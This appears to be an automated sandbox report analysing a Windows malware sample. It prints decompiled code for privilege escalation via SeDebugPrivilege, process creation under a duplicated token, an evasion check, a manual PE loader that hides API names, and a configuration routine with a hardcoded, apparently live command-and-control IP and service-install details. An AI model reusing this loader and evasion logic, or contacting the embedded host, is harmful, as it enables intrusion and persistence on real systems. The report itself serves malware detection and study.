Instruction ID: 56ef146ae7f51ab050c3d27f651c925b52f1b0f582517e1b99aea3cd4f5826d7
Opcode Fuzzy Hash: 995f21f2eb57822699499ff34c2db48fd8a7cdd818a8d2c741d24f58e6d7dac6
Instruction Fuzzy Hash: 5E418FB180116DBFEB11DBA4CC89EDE7BBCFB05385F5000A5F609A2051D7749A4A8BB1

Uniqueness

Uniqueness Score: -1.00%

Function 10001E41, Relevance: 38.6, APIs: 5, Strings: 17, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001E41() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				int _t27;
				int _t30;
				int _t31;

				_t27 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				if(_t27 != 0) {
					_v44 = 0x53;
					_v43 = 0x65;
					_v42 = 0x44;
					_v41 = 0x65;
					_v40 = 0x62;
					_v39 = 0x75;
					_v38 = 0x67;
					_v37 = 0x50;
					_v36 = 0x72;
					_v35 = 0x69;
					_v34 = 0x76;
					_v33 = 0x69;
					_v32 = 0x6c;
					_v31 = 0x65;
					_v30 = 0x67;
					_v29 = 0x65;
					_v28 = 0;
					_t30 = LookupPrivilegeValueA(0,  &_v44,  &(_v24.Privileges)); // executed
					if(_t30 != 0) {
						_v24.PrivilegeCount = 1;
						_v12 = 2;
						AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0); // executed
					}
					_t31 = FindCloseChangeNotification(_v8); // executed
					return _t31;
				}
				return _t27;
			}

0x10001e54
0x10001e5c
0x10001e6e
0x10001e72
0x10001e76
0x10001e7a
0x10001e7e
0x10001e82
0x10001e86
0x10001e8a
0x10001e8e
0x10001e92
0x10001e96
0x10001e9a
0x10001e9e
0x10001ea2
0x10001ea6
0x10001eaa
0x10001eae
0x10001eb1
0x10001eb9
0x10001ec6
0x10001ecd
0x10001ed4
0x10001ed4
0x10001edd
0x00000000
0x10001ee3
0x10001ee5

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,1000BD78), ref: 10001E47
OpenProcessToken.ADVAPI32(00000000,00000028,1000BD78,?,?,?,?,?,?,?,?,?,1000BD78), ref: 10001E54
LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10001EB1
AdjustTokenPrivileges.KERNELBASE(1000BD78,00000000,?,00000000,00000000,00000000), ref: 10001ED4
FindCloseChangeNotification.KERNELBASE(1000BD78), ref: 10001EDD

Strings

v, xrefs: 10001E96
D, xrefs: 10001E76
i, xrefs: 10001E92
e, xrefs: 10001E7A
r, xrefs: 10001E8E
l, xrefs: 10001E9E
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 10001E65
u, xrefs: 10001E82
g, xrefs: 10001E86
S, xrefs: 10001E6E
g, xrefs: 10001EA6
b, xrefs: 10001E7E
P, xrefs: 10001E8A
e, xrefs: 10001E72
e, xrefs: 10001EAA
e, xrefs: 10001EA2
i, xrefs: 10001E9A

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ProcessToken$AdjustChangeCloseCurrentFindLookupNotificationOpenPrivilegePrivilegesValue
String ID: D$P$S$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij$b$e$e$e$e$g$g$i$i$l$r$u$v
API String ID: 4140947299-1743372266
Opcode ID: 90edec88072395091c5d46d080923f9f8834c7edd8eaec99bf565d8858ef39f8
Instruction ID: de11c8eeb49c80ab992c39df005bd3a14ca963d95a89e20099bd6863c45f21aa
Opcode Fuzzy Hash: 90edec88072395091c5d46d080923f9f8834c7edd8eaec99bf565d8858ef39f8
Instruction Fuzzy Hash: A9210E608082C9DEFB01CBE8C889BEFBFB9AB19749F180048D44576281D7BA5A18C775

Uniqueness

Uniqueness Score: -1.00%

Function 10003333, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 98
libraryprocessloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10003333(CHAR* _a4) {
				void* _v8;
				void* _v12;
				void _v16;
				CHAR* _v20;
				struct HINSTANCE__* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOA _v108;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t33;
				intOrPtr* _t42;
				_Unknown_base(*)()* _t55;
				int _t57;
				void* _t58;

				_t32 = LoadLibraryA("userenv.dll"); // executed
				_v24 = _t32;
				_t33 = GetProcAddress(_t32, "CreateEnvironmentBlock");
				_t55 = _t33;
				_t57 = 0x44;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				memset( &_v108, 0, _t57);
				memset( &_v40, 0, 0x10);
				_v40.hProcess = 0;
				_v40.hThread = 0;
				_v40.dwProcessId = 0;
				_v40.dwThreadId = 0;
				_v108.cb = _t57;
				_v108.lpDesktop = "WinSta0\\Default";
				OpenProcessToken(GetCurrentProcess(), 0xf01ff,  &_v12);
				DuplicateTokenEx(_v12, 0x2000000, 0, 1, 1,  &_v8);
				_t42 =  *0x100272e8;
				if(_t42 == 0) {
					_t58 = 0;
				} else {
					_v16 =  *_t42();
					SetTokenInformation(_v8, 0xc,  &_v16, 4);
					 *_t55( &_v20, _v8, 0); // executed
					CreateProcessAsUserA(_v8, 0, _a4, 0, 0, 0, 0x430, _v20, 0,  &_v108,  &_v40); // executed
					_t58 = _v40.hProcess;
					CloseHandle(_v8);
					CloseHandle(_v12);
				}
				if(_v24 != 0) {
					FreeLibrary(_v24); // executed
				}
				return _t58;
			}

0x10003341
0x1000334d
0x10003350
0x10003358
0x1000335a
0x10003363
0x10003366
0x10003369
0x1000336c
0x1000336f
0x1000337b
0x10003383
0x10003386
0x10003389
0x1000338c
0x1000338f
0x10003392
0x100033a9
0x100033c0
0x100033c6
0x100033cd
0x10003427
0x100033cf
0x100033d1
0x100033df
0x100033ed
0x1000340a
0x10003413
0x10003416
0x1000341f
0x1000341f
0x1000342c
0x10003431
0x10003431
0x1000343d

APIs

LoadLibraryA.KERNELBASE(userenv.dll,?,00000000), ref: 10003341
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 10003350
memset.MSVCRT ref: 1000336F
memset.MSVCRT ref: 1000337B
GetCurrentProcess.KERNEL32(?,?,?,?,00000000), ref: 10003399
OpenProcessToken.ADVAPI32(00000000,000F01FF,n,?,?,?,?,00000000), ref: 100033A9
DuplicateTokenEx.ADVAPI32(10002E80,02000000,00000000,00000001,00000001,?,?,?,?,?,00000000), ref: 100033C0
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?,?,?,00000000), ref: 100033DF
CreateProcessAsUserA.KERNELBASE(?,00000000,10002E80,00000000,00000000,00000000,00000430,?,00000000,?,?,?,?,?,?,00000000), ref: 1000340A
CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 10003416
CloseHandle.KERNEL32(10002E80,?,?,?,?,00000000), ref: 1000341F
FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 10003431

Strings

userenv.dll, xrefs: 1000333C
n, xrefs: 100033A2
CreateEnvironmentBlock, xrefs: 10003347

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ProcessToken$CloseHandleLibrarymemset$AddressCreateCurrentDuplicateFreeInformationLoadOpenProcUser
String ID: CreateEnvironmentBlock$n$userenv.dll
API String ID: 389336417-3167039932
Opcode ID: 59ea12784eb641e0cdc3f6cf60bfbff6cf975fda55f716f2fd05c2ba7c9907d1
Instruction ID: b8008fe577320e72a904cd32959c85e9a26173e69b19157f350ca4717dd46128
Opcode Fuzzy Hash: 59ea12784eb641e0cdc3f6cf60bfbff6cf975fda55f716f2fd05c2ba7c9907d1
Instruction Fuzzy Hash: 583102B2900228FBEB11DBD5CC899EEBFBCFF08741F504056F609A6160D7716A41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10002550, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E10002550() {
				long _v8;
				intOrPtr _v20;
				intOrPtr _v28;
				struct _SYSTEM_INFO _v68;
				void* _v76;
				long _v80;
				void* _t14;
				long _t21;
				void* _t28;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(0x1001b420);
				_push(0x10015a2a);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_v28 = _t30 - 0x3c;
				_v80 = 0;
				GetSystemInfo( &_v68); // executed
				_t21 = _v68.dwPageSize;
				_t14 = VirtualAlloc(0, _t21, 0x1000, 4); // executed
				_t28 = _t14;
				_v76 = _t28;
				if(_t28 != 0) {
					 *_t28 = 0xc3;
					VirtualProtect(_t28, _t21, 0x120,  &_v80); // executed
					_v8 = 0;
					_v76();
					VirtualFree(_t28, 0, 0x8000);
					_v8 = _v8 | 0xffffffff;
					_push(1);
					_pop(0);
				}
				 *[fs:0x0] = _v20;
				return 0;
			}

0x10002553
0x10002555
0x1000255a
0x10002565
0x10002566
0x10002573
0x10002578
0x1000257f
0x10002585
0x10002591
0x10002597
0x10002599
0x1000259e
0x100025a0
0x100025ae
0x100025b4
0x100025b7
0x100025c1
0x100025c7
0x100025cb
0x100025cd
0x100025cd
0x100025f0
0x100025fb

APIs

GetSystemInfo.KERNELBASE(?,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF), ref: 1000257F
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF), ref: 10002591
VirtualProtect.KERNELBASE(00000000,?,00000120,?,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF), ref: 100025AE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF,?,100029D7), ref: 100025C1

Strings

Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 10002570

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFreeInfoProtectSystem
String ID: Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 4245623992-3480391467
Opcode ID: 08ee8134fc8ee78246fbdc7ed9193944ecbf605a2e8f0286770de2744faef9f2
Instruction ID: 5ef7568675c4de6a11893db13af6e4d7e6f98ad31903f2cd875fafb4d3f11bf9
Opcode Fuzzy Hash: 08ee8134fc8ee78246fbdc7ed9193944ecbf605a2e8f0286770de2744faef9f2
Instruction Fuzzy Hash: 1011C471900A18FFE721DF988C85F9EBBBCFB49B61F104215F661E22D0D77459428B61

Uniqueness

Uniqueness Score: -1.00%

Function 00403570, Relevance: 82.5, APIs: 9, Strings: 38, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00403570(short* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _t88;
				void* _t94;
				_Unknown_base(*)()* _t98;
				_Unknown_base(*)()* _t101;
				intOrPtr _t109;
				intOrPtr _t118;
				intOrPtr* _t121;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;
				intOrPtr* _t166;
				signed int _t170;

				_t130 = __ebx;
				_t88 =  *0x44f5d0; // 0x8e7de579
				 *(_t170 + 0x44) = _t88 ^ _t170;
				if( *__ebx == 0x5a4d) {
					_t166 =  *((intOrPtr*)(__ebx + 0x3c)) + __ebx;
					if( *_t166 == 0x4550) {
						_push(__esi);
						_push(__edi);
						 *((char*)(_t170 + 0x15)) = 0x45;
						 *(_t170 + 0x18) = 0x45;
						 *((char*)(_t170 + 0x1c)) = 0x4b;
						 *((char*)(_t170 + 0x1e)) = 0x52;
						 *((char*)(_t170 + 0x1f)) = 0x4e;
						 *((char*)(_t170 + 0x21)) = 0x4c;
						 *((char*)(_t170 + 0x22)) = 0x33;
						 *((char*)(_t170 + 0x23)) = 0x32;
						 *(_t170 + 0x24) = 0x2e;
						 *((char*)(_t170 + 0x25)) = 0x64;
						 *((char*)(_t170 + 0x26)) = 0x6c;
						 *((char*)(_t170 + 0x27)) = 0x6c;
						 *((char*)(_t170 + 0x28)) = 0;
						 *((char*)(_t170 + 0x38)) = 0x56;
						 *((char*)(_t170 + 0x39)) = 0x69;
						 *((char*)(_t170 + 0x3a)) = 0x72;
						 *((char*)(_t170 + 0x3b)) = 0x74;
						 *((char*)(_t170 + 0x3c)) = 0x75;
						 *((char*)(_t170 + 0x3d)) = 0x61;
						 *((char*)(_t170 + 0x3e)) = 0x6c;
						 *((char*)(_t170 + 0x3f)) = 0x41;
						 *(_t170 + 0x40) = 0x6c;
						 *((char*)(_t170 + 0x41)) = 0x6c;
						 *((char*)(_t170 + 0x42)) = 0x6f;
						 *((char*)(_t170 + 0x43)) = 0x63;
						 *(_t170 + 0x44) = 0;
						 *((intOrPtr*)(_t170 + 0x20)) = GetProcAddress(LoadLibraryA(_t170 + 0x18), _t170 + 0x30);
						_t94 = VirtualAlloc( *(_t166 + 0x34),  *(_t166 + 0x50), 0x2000, 4); // executed
						_t161 = _t94;
						if(_t161 != 0) {
							L6:
							 *((char*)(_t170 + 0x48)) = 0x73;
							 *((char*)(_t170 + 0x49)) = 0x73;
							_t40 = _t170 + 0x40; // 0x6c
							 *((char*)(_t170 + 0x48)) = 0x47;
							 *((char*)(_t170 + 0x49)) = 0x65;
							 *((char*)(_t170 + 0x4a)) = 0x74;
							 *((char*)(_t170 + 0x4b)) = 0x50;
							 *((char*)(_t170 + 0x4c)) = 0x72;
							 *((char*)(_t170 + 0x4d)) = 0x6f;
							 *((char*)(_t170 + 0x4e)) = 0x63;
							 *((char*)(_t170 + 0x4f)) = 0x65;
							 *((char*)(_t170 + 0x52)) = 0x48;
							 *((char*)(_t170 + 0x53)) = 0x65;
							 *((char*)(_t170 + 0x54)) = 0x61;
							 *((char*)(_t170 + 0x55)) = 0x70;
							 *((char*)(_t170 + 0x56)) = 0;
							_t98 = GetProcAddress(LoadLibraryA(_t170 + 0x18), _t40);
							_t55 = _t170 + 0x24; // 0x2e
							 *(_t170 + 0xc) = _t98;
							 *((char*)(_t170 + 0x2c)) = 0x48;
							 *((char*)(_t170 + 0x2d)) = 0x65;
							 *((char*)(_t170 + 0x2e)) = 0x61;
							 *((char*)(_t170 + 0x2f)) = 0x70;
							 *(_t170 + 0x30) = 0x41;
							 *((char*)(_t170 + 0x31)) = 0x6c;
							 *((char*)(_t170 + 0x32)) = 0x6c;
							 *((char*)(_t170 + 0x33)) = 0x6f;
							 *((char*)(_t170 + 0x34)) = 0x63;
							 *((char*)(_t170 + 0x35)) = 0;
							_t101 = GetProcAddress(LoadLibraryA(_t170 + 0x18), _t55);
							_t157 =  *_t101( *(_t170 + 0x14)(0, 0x14));
							 *(_t157 + 4) = _t161;
							 *((intOrPtr*)(_t157 + 0xc)) = 0;
							 *((intOrPtr*)(_t157 + 8)) = 0;
							 *((intOrPtr*)(_t157 + 0x10)) = 0;
							VirtualAlloc(_t161,  *(_t166 + 0x50), 0x1000, 4);
							 *(_t170 + 0xc) = VirtualAlloc(_t161,  *(_t166 + 0x54), 0x1000, 4);
							E0042D2F0(_t130, _t157, _t161, _t106, _t130,  *(_t130 + 0x3c) +  *(_t166 + 0x54));
							_t153 =  *(_t130 + 0x3c);
							_t109 =  *(_t170 + 0x18) +  *(_t130 + 0x3c);
							 *_t157 = _t109;
							 *(_t109 + 0x34) = _t161;
							E00402FC0(_t166, _t166, _t130, _t157);
							_t170 = _t170 + 0x14;
							_t112 = _t161 !=  *(_t166 + 0x34);
							if(_t161 !=  *(_t166 + 0x34)) {
								E004034F0(_t157, _t112);
								_t170 = _t170 + 4;
							}
							if(E00403320(_t157) == 0) {
								L12:
								E004038B0(_t157, _t166);
								goto L13;
							} else {
								E00403140(_t157);
								_t118 =  *((intOrPtr*)( *_t157 + 0x28));
								if(_t118 == 0) {
									L15:
									_pop(_t159);
									_pop(_t163);
									return E0042569C(_t157, _t130,  *(_t170 + 0x50) ^ _t170, _t153, _t159, _t163);
								} else {
									_t121 = _t118 + _t161;
									if(_t121 == 0) {
										goto L12;
									} else {
										_push(0);
										_push(1);
										_push(_t161);
										if( *_t121() != 0) {
											 *((intOrPtr*)(_t157 + 0x10)) = 1;
											goto L15;
										} else {
											goto L12;
										}
									}
								}
							}
						} else {
							_t153 =  *(_t166 + 0x50);
							_t161 =  *((intOrPtr*)(_t170 + 0x20))(_t94,  *(_t166 + 0x50), 0x2000, 4);
							if(_t161 == 0) {
								L13:
								_pop(_t158);
								_pop(_t162);
								return E0042569C(0, _t130,  *(_t170 + 0x44) ^ _t170, _t153, _t158, _t162);
							} else {
								goto L6;
							}
						}
					} else {
						return E0042569C(0, __ebx,  *(_t170 + 0x44) ^ _t170, __edx, __edi, __esi);
					}
				} else {
					return E0042569C(0, __ebx,  *(_t170 + 0x44) ^ _t170, __edx, __edi, __esi);
				}
			}

Strings

r, xrefs: 004036B1
t, xrefs: 00403619
p, xrefs: 00403704
MZ, xrefs: 0040357E
l, xrefs: 0040370E
c, xrefs: 004036BB
H, xrefs: 004036F5
u, xrefs: 0040361E
l, xrefs: 00403713
c, xrefs: 0040371D
e, xrefs: 004036C0
p, xrefs: 004036D4
H, xrefs: 004036C5
o, xrefs: 00403718
a, xrefs: 004036FF
a, xrefs: 00403623
e, xrefs: 004036A2
K, xrefs: 004035D3
G, xrefs: 0040369D
A, xrefs: 00403709
V, xrefs: 0040360A
e, xrefs: 004036FA
a, xrefs: 004036CF
R, xrefs: 004035D8
l, xrefs: 00403628
lAla, xrefs: 00403693, 00403697
o, xrefs: 004036B6
P, xrefs: 004036AC
e, xrefs: 004036CA
t, xrefs: 004036A7
r, xrefs: 00403614
2, xrefs: 004035EC
L, xrefs: 004035E2
N, xrefs: 004035DD
i, xrefs: 0040360F
3, xrefs: 004035E7
.23L, xrefs: 004036E7, 004036EF
A, xrefs: 0040362D

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .23L$2$3$A$A$G$H$H$K$L$MZ$N$P$R$V$a$a$a$c$c$e$e$e$e$i$l$l$l$lAla$o$o$p$p$r$r$t$t$u
API String ID: 0-2322425104
Opcode ID: 0a7a0d349843bd16624f839a677c41b88618fa83c2f17b51b6cb3e1189237c34
Instruction ID: f4beb3154294a0f0accf3de684e196bc4cb8e32a4e9d4595e55d073d5065b5c4
Opcode Fuzzy Hash: 0a7a0d349843bd16624f839a677c41b88618fa83c2f17b51b6cb3e1189237c34
Instruction Fuzzy Hash: 8D816C7050C3C09EE311DB688848B1FBFE56F96708F48495DF6C49B282D7BAD918876B

Uniqueness

Uniqueness Score: -1.00%

Function 1000BAF1, Relevance: 70.3, APIs: 32, Strings: 8, Instructions: 286
stringmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000BAF1(void* __ecx, void* __edx, void* __eflags, void _a4) {
				long _v8;
				long _v12;
				struct tagMSG _v40;
				char _v128;
				char _v4144;
				void* __edi;
				void* __ebp;
				CHAR* _t40;
				long _t43;
				int _t97;
				intOrPtr _t109;
				void* _t125;
				void* _t140;
				void* _t146;
				void* _t150;
				void* _t151;
				void* _t152;
				CHAR* _t153;
				void* _t176;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;

				_t146 = __edx;
				E100158E0(0x102c, __ecx);
				_t40 = E1000C51F(0x10027210);
				_push(0x2a9);
				L10015806();
				_t153 = _t40;
				memcpy(_t153,  &_a4, 0x2a9);
				_t43 = 4;
				_v8 = _t43;
				VirtualProtect(_t153, 0x2a8, _t43,  &_v12); // executed
				VirtualProtect(_t153, 0x2a8, _v12,  &_v8); // executed
				_t6 =  &(_t153[0x26]); // 0x26
				lstrcpyA("Fatal", _t6);
				lstrcpyA("103.119.44.216", _t153);
				_t7 =  &(_t153[0x44]); // 0x44
				lstrcpyA("422413711", _t7);
				_t8 =  &(_t153[0x1d9]); // 0x1d9
				lstrcpyA(0x10027174, _t8);
				_t9 =  &(_t153[0x175]); // 0x175
				lstrcpyA("%SystemRoot%\", _t9);
				_t10 =  &(_t153[0x58]); // 0x58
				lstrcpyA("Vwxyab.exe", _t10);
				_t11 =  &(_t153[0x71]); // 0x71
				lstrcpyA("Vwxyab Defghijk", _t11);
				_t12 =  &(_t153[0xb7]); // 0xb7
				lstrcpyA("Vwxyab Defghijk Mnopqrst Vwxy", _t12);
				_t13 =  &(_t153[0xfd]); // 0xfd
				lstrcpyA(0x10027454, _t13);
				 *0x10027150 = _t153[0x20];
				 *0x10027406 = _t153[0x24];
				 *0x10027408 = _t153[0x26f];
				 *0x1002713c = _t153[0x270];
				 *0x100275a4 = _t153[0x274];
				 *0x10027144 = _t153[0x278];
				 *0x100275ac = _t153[0x27c];
				 *0x10027134 = _t153[0x280];
				 *0x1002714c = _t153[0x284];
				 *0x10027598 = _t153[0x288];
				 *0x1002759c = _t153[0x28c];
				 *0x100275a0 = _t153[0x290];
				 *0x10027148 = _t153[0x294];
				 *0x100275a8 = _t153[0x298];
				 *0x10027138 = _t153[0x29c];
				 *0x10027130 = _t153[0x2a0];
				_t150 = 0x12;
				 *0x10027140 = _t153[0x2a4];
				E10001E15(0x100273d8, strlen(0x100273d8), lstrcpyA);
				E10001E15(0x10027154, strlen(0x10027154), lstrcpyA);
				E10001E15(0x10027514, strlen(0x10027514), 0x50);
				E10001E15(0x10027174, strlen(0x10027174), lstrcpyA);
				E10001E15(0x10027534, strlen(0x10027534), lstrcpyA);
				E10001E15(0x100273ec, strlen(0x100273ec), lstrcpyA);
				E10001E15(0x1002740c, strlen(0x1002740c), lstrcpyA);
				E10001E15(0x100274cc, strlen(0x100274cc), lstrcpyA);
				_t97 = strlen(0x10027454);
				_t140 = _t150;
				_push(_t97);
				_push(0x10027454);
				E10001E15();
				PostThreadMessageA(GetCurrentThreadId(), 0, 0, 0); // executed
				GetInputState();
				GetMessageA( &_v40, 0, 0, 0); // executed
				E10001E41(); // executed
				_t151 = OpenProcess(0x1f0fff, 0, GetCurrentProcessId());
				SetPriorityClass(_t151, 0x80); // executed
				CloseHandle(_t151);
				_t152 = 1;
				_t176 =  *0x1002713c - _t152; // 0x1
				if(_t176 == 0) {
					E10002506();
				}
				_t177 =  *0x100275a4 - _t152; // 0x1
				if(_t177 != 0) {
					L5:
					_t179 =  *0x10027144 - _t152; // 0x0
					if(_t179 != 0 || E100025FC(_t140) == 0) {
						_t181 =  *0x100275ac - _t152; // 0x0
						if(_t181 == 0) {
							E1000298B(_t140, _t146, _t152, _t181);
						}
						_t182 =  *0x10027148 - _t152; // 0x0
						if(_t182 == 0) {
							E100028B4(_t182);
						}
						_t183 =  *0x10027138 - _t152; // 0x1
						if(_t183 == 0) {
							_push(0);
							E1000CCF9(0, 0, E1000290B, 0, 0, 0); // executed
						}
						_t184 =  *0x10027130 - _t152; // 0x0
						if(_t184 == 0) {
							E10001603( &_v128, _t184);
							E100081E3( &_v4144, _t184,  &_v128);
							E10008205();
							E10008182( &_v4144);
							E100016A7( &_v128);
						}
						_t185 =  *0x10027140 - _t152; // 0x0
						if(_t185 == 0) {
							E10002954();
						}
						_t109 =  *0x10027408; // 0x2
						if(_t109 != 0) {
							__eflags = _t109 - _t152;
							if(_t109 != _t152) {
								__eflags = _t109 - 2;
								if(_t109 == 2) {
									E1000B925(); // executed
								}
							} else {
								E1000B69F();
							}
						} else {
							E1000B482();
						}
						return 0;
					} else {
						ExitProcess(0);
					}
				}
				_t125 = E10002550(); // executed
				if(_t125 == 0) {
					goto L5;
				}
				ExitProcess(0);
			}

0x1000baf1
0x1000baf9
0x1000bb06
0x1000bb10
0x1000bb11
0x1000bb16
0x1000bb1e
0x1000bb37
0x1000bb3c
0x1000bb3f
0x1000bb4a
0x1000bb52
0x1000bb5b
0x1000bb63
0x1000bb65
0x1000bb6e
0x1000bb70
0x1000bb7c
0x1000bb7e
0x1000bb8a
0x1000bb8c
0x1000bb95
0x1000bb97
0x1000bba0
0x1000bba2
0x1000bbae
0x1000bbb0
0x1000bbbd
0x1000bbc2
0x1000bbcb
0x1000bbd8
0x1000bbe3
0x1000bbee
0x1000bbfb
0x1000bc06
0x1000bc11
0x1000bc1c
0x1000bc27
0x1000bc32
0x1000bc3d
0x1000bc48
0x1000bc53
0x1000bc5e
0x1000bc69
0x1000bc74
0x1000bc7c
0x1000bc8a
0x1000bca2
0x1000bcbb
0x1000bcd3
0x1000bceb
0x1000bd03
0x1000bd1b
0x1000bd33
0x1000bd3d
0x1000bd43
0x1000bd44
0x1000bd45
0x1000bd46
0x1000bd5a
0x1000bd60
0x1000bd6d
0x1000bd73
0x1000bd8b
0x1000bd93
0x1000bd9a
0x1000bda2
0x1000bda3
0x1000bda9
0x1000bdab
0x1000bdab
0x1000bdb0
0x1000bdb6
0x1000bdc8
0x1000bdc8
0x1000bdce
0x1000bde0
0x1000bde6
0x1000bde8
0x1000bde8
0x1000bded
0x1000bdf3
0x1000bdf5
0x1000bdf5
0x1000bdfa
0x1000be00
0x1000be02
0x1000be0d
0x1000be12
0x1000be15
0x1000be1b
0x1000be20
0x1000be2f
0x1000be3a
0x1000be45
0x1000be4d
0x1000be4d
0x1000be52
0x1000be58
0x1000be5a
0x1000be5a
0x1000be5f
0x1000be66
0x1000be6f
0x1000be71
0x1000be7a
0x1000be7d
0x1000be7f
0x1000be7f
0x1000be73
0x1000be73
0x1000be73
0x1000be68
0x1000be68
0x1000be68
0x1000be8a
0x1000bdd9
0x1000bdda
0x1000bdda
0x1000bdce
0x1000bdb8
0x1000bdbf
0x00000000
0x00000000
0x1000bdc2

APIs

#823.MFC42(000002A9), ref: 1000BB11
memcpy.MSVCRT ref: 1000BB1E
VirtualProtect.KERNELBASE(00000000,000002A8,00000004,?), ref: 1000BB3F
VirtualProtect.KERNELBASE(00000000,000002A8,?,?), ref: 1000BB4A
lstrcpyA.KERNEL32(Fatal,00000026), ref: 1000BB5B
lstrcpyA.KERNEL32(103.119.44.216,00000000), ref: 1000BB63
lstrcpyA.KERNEL32(422413711,00000044), ref: 1000BB6E
lstrcpyA.KERNEL32(10027174,000001D9), ref: 1000BB7C
lstrcpyA.KERNEL32(%SystemRoot%\,00000175), ref: 1000BB8A
lstrcpyA.KERNEL32(Vwxyab.exe,00000058), ref: 1000BB95
lstrcpyA.KERNEL32(Vwxyab Defghijk,00000071), ref: 1000BBA0
lstrcpyA.KERNEL32(Vwxyab Defghijk Mnopqrst Vwxy,000000B7), ref: 1000BBAE
lstrcpyA.KERNEL32(Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,000000FD), ref: 1000BBBD
strlen.MSVCRT ref: 1000BC81
strlen.MSVCRT ref: 1000BC99
strlen.MSVCRT ref: 1000BCB2
strlen.MSVCRT ref: 1000BCCA
strlen.MSVCRT ref: 1000BCE2
strlen.MSVCRT ref: 1000BCFA
strlen.MSVCRT ref: 1000BD12
strlen.MSVCRT ref: 1000BD2A
strlen.MSVCRT ref: 1000BD3D
GetCurrentThreadId.KERNEL32 ref: 1000BD53
PostThreadMessageA.USER32(00000000), ref: 1000BD5A
GetInputState.USER32 ref: 1000BD60
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000BD6D

Part of subcall function 10001E41: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,1000BD78), ref: 10001E47
Part of subcall function 10001E41: OpenProcessToken.ADVAPI32(00000000,00000028,1000BD78,?,?,?,?,?,?,?,?,?,1000BD78), ref: 10001E54
Part of subcall function 10001E41: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10001EB1
Part of subcall function 10001E41: AdjustTokenPrivileges.KERNELBASE(1000BD78,00000000,?,00000000,00000000,00000000), ref: 10001ED4
Part of subcall function 10001E41: FindCloseChangeNotification.KERNELBASE(1000BD78), ref: 10001EDD

GetCurrentProcessId.KERNEL32 ref: 1000BD78
OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000BD85
